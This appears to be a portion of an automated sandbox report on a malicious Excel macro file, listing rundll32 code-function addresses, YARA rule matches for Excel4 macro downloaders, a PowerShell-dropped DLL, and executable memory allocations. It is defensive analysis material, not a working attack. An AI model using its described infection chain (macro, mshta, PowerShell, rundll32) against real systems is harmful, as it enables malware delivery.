                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003359F211_2_003359F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034AA3011_2_0034AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00331A5611_2_00331A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033EA9911_2_0033EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00338B3D11_2_00338B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034BB2311_2_0034BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00340B1911_2_00340B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033BB7E11_2_0033BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034CB5B11_2_0034CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00347BA611_2_00347BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00339B8311_2_00339B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00344B8711_2_00344B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00348BE311_2_00348BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034DBEA11_2_0034DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00332BD911_2_00332BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00349BCF11_2_00349BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00337C3711_2_00337C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034AC3A11_2_0034AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00333C3C11_2_00333C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00350C1411_2_00350C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00334C5D11_2_00334C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00346C4911_2_00346C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034DCF711_2_0034DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00345CC411_2_00345CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00336D2411_2_00336D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00346DF811_2_00346DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00347DD511_2_00347DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00339DCF11_2_00339DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00333E3F11_2_00333E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00350E3A11_2_00350E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034BE2711_2_0034BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00335E6011_2_00335E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034AE6D11_2_0034AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00340E5311_2_00340E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033EE8111_2_0033EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033AEFB11_2_0033AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00334EE311_2_00334EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00349EEC11_2_00349EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034DEDC11_2_0034DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00350F3311_2_00350F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033CF4711_2_0033CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033DFF311_2_0033DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00337FF211_2_00337FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D303C12_2_003D303C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D323F12_2_003D323F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EA03A12_2_003EA03A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003F023A12_2_003F023A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D703712_2_003D7037
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EE83512_2_003EE835
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E9E3012_2_003E9E30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EBA3112_2_003EBA31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EB22712_2_003EB227
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003F001412_2_003F0014
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D3C1612_2_003D3C16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D841112_2_003D8411
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E7A0612_2_003E7A06
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DF40112_2_003DF401
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E847F12_2_003E847F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EA26D12_2_003EA26D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E9A6612_2_003E9A66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D526012_2_003D5260
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D405D12_2_003D405D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EF45612_2_003EF456
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D0E5612_2_003D0E56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D145112_2_003D1451
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D165112_2_003D1651
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E025312_2_003E0253
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DF84F12_2_003DF84F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E604912_2_003E6049
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E14BA12_2_003E14BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D64B312_2_003D64B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DDE9912_2_003DDE99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DE49B12_2_003DE49B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E0C8912_2_003E0C89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DE28112_2_003DE281
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DECFD12_2_003DECFD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DA2FB12_2_003DA2FB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003ED0F712_2_003ED0F7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E92EC12_2_003E92EC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E96E812_2_003E96E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D42E312_2_003D42E3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D58E212_2_003D58E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003ED2DC12_2_003ED2DC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DCAD812_2_003DCAD8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DD6CC12_2_003DD6CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E5ACA12_2_003E5ACA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DA6C712_2_003DA6C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E50C412_2_003E50C4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D7F3D12_2_003D7F3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D6B3512_2_003D6B35
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003F033312_2_003F0333
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D612412_2_003D6124
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EAF2312_2_003EAF23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DFF1912_2_003DFF19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E791912_2_003E7919
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E351612_2_003E3516
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D8B1412_2_003D8B14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DAF7E12_2_003DAF7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D7D6912_2_003D7D69
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E0B6B12_2_003E0B6B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D476112_2_003D4761
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D995F12_2_003D995F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EBF5B12_2_003EBF5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E195012_2_003E1950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DAB4D12_2_003DAB4D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D494812_2_003D4948
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E7D4B12_2_003E7D4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DC34712_2_003DC347
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D374612_2_003D3746
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D45BB12_2_003D45BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D75B712_2_003D75B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EFDB512_2_003EFDB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003F07AD12_2_003F07AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E6FA612_2_003E6FA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EB7A012_2_003EB7A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003ED79512_2_003ED795
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DE99112_2_003DE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DDD9112_2_003DDD91
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EC78912_2_003EC789
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E3F8712_2_003E3F87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D9F8712_2_003D9F87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E3F8412_2_003E3F84
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D8F8312_2_003D8F83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E89FA12_2_003E89FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E61F812_2_003E61F8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DD3F312_2_003DD3F3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D73F212_2_003D73F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D4DF212_2_003D4DF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003ECFEA12_2_003ECFEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E7FE312_2_003E7FE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D1FD912_2_003D1FD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E71D512_2_003E71D5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E8FCF12_2_003E8FCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D91CF12_2_003D91CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DD9CF12_2_003DD9CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00353C3C12_2_00353C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035901112_2_00359011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036044F12_2_0036044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003620BA12_2_003620BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035F8FD12_2_0035F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035D6D812_2_0035D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036473C12_2_0036473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036411612_2_00364116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003713AD12_2_003713AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035AB8712_2_0035AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00357FF212_2_00357FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003559F212_2_003559F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003695FA12_2_003695FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00357C3712_2_00357C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036F43512_2_0036F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036AA3012_2_0036AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036C63112_2_0036C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00353E3F12_2_00353E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036AC3A12_2_0036AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00370E3A12_2_00370E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036BE2712_2_0036BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035481612_2_00354816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00370C1412_2_00370C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036860612_2_00368606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036000112_2_00360001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036907F12_2_0036907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036A66612_2_0036A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00355E6012_2_00355E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036AE6D12_2_0036AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0037005612_2_00370056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00351A5612_2_00351A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035205112_2_00352051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035225112_2_00352251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00360E5312_2_00360E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00354C5D12_2_00354C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00366C4912_2_00366C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003570B312_2_003570B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035EA9912_2_0035EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035F09B12_2_0035F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035EE8112_2_0035EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036188912_2_00361889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036DCF712_2_0036DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035AEFB12_2_0035AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00354EE312_2_00354EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003564E212_2_003564E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00369EEC12_2_00369EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036A2E812_2_0036A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036DEDC12_2_0036DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035B2C712_2_0035B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00365CC412_2_00365CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E2CC12_2_0035E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003666CA12_2_003666CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035773512_2_00357735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00370F3312_2_00370F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00358B3D12_2_00358B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00356D2412_2_00356D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036BB2312_2_0036BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035971412_2_00359714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036851912_2_00368519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00360B1912_2_00360B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035BB7E12_2_0035BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035536112_2_00355361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035896912_2_00358969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036176B12_2_0036176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036255012_2_00362550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035A55F12_2_0035A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036CB5B12_2_0036CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035CF4712_2_0035CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035434612_2_00354346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035B74D12_2_0035B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035554812_2_00355548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036894B12_2_0036894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003709B512_2_003709B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003581B712_2_003581B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003551BB12_2_003551BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00367BA612_2_00367BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036C3A012_2_0036C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036E39512_2_0036E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E99112_2_0035E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00364B8712_2_00364B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00359B8312_2_00359B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036D38912_2_0036D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035DFF312_2_0035DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00366DF812_2_00366DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00368BE312_2_00368BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036DBEA12_2_0036DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00367DD512_2_00367DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00352BD912_2_00352BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00369BCF12_2_00369BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00359DCF12_2_00359DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E5CF12_2_0035E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AF8FD13_2_002AF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AAB8713_2_002AAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AE99113_2_002AE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002BBE2713_2_002BBE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002BAC3A13_2_002BAC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A3E3F13_2_002A3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A3C3C13_2_002A3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002C0E3A13_2_002C0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002BC63113_2_002BC631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002BAA3013_2_002BAA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A7C3713_2_002A7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002BF43513_2_002BF435
                            Source: 41B1.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: imedpub.com_10.xlsMacro extractor: Sheet name: Macro1
                            Source: imedpub.com_10.xlsMacro extractor: Sheet name: Macro1
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                            Source: Joe Sandbox ViewDropped File: C:\Users\Public\Documents\ssd.dll 7A4A00A0FD4DBF14780E1536313A65728FE875D3B05973043FE6A0F61DAADF4A
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E249 DeleteService,12_2_0035E249
                            Source: imedpub.com_10.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: imedpub.com_10.xls, type: SAMPLEMatched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Users\user\Desktop\imedpub.com_10.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\imedpub.com_10.xls, type: DROPPEDMatched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Qnjiyxnfa\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: imedpub.com_10.xlsOLE indicator, VBA macros: true
                            Source: imedpub.com_10.xls.0.drOLE indicator, VBA macros: true
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Documents\ssd.dllJump to behavior
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@21/13@1/47
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: imedpub.com_10.xlsOLE indicator, Workbook stream: true
                            Source: imedpub.com_10.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,9_2_100125C0
                            Source: imedpub.com_10.xlsReversingLabs: Detection: 30%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......X.[.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............y=.w......................lk....................................}..v............0.................".............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................lk..... ..............................}..v............0...............X.[.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............y=.w......................lk....................................}..v............0.................".............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................lk....8.[.............................}..v....P.......0.................[.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............y=.w....#.................lk....................................}..v....h.......0.................".............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................lk......[.............................}..v............0...............h.[.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............Q.lk....E...............................}..v.....h......0...............8.[.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............Q.lk....E...............................}..v....0.......0...............8.[.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............8.......:.......................Jump to behavior
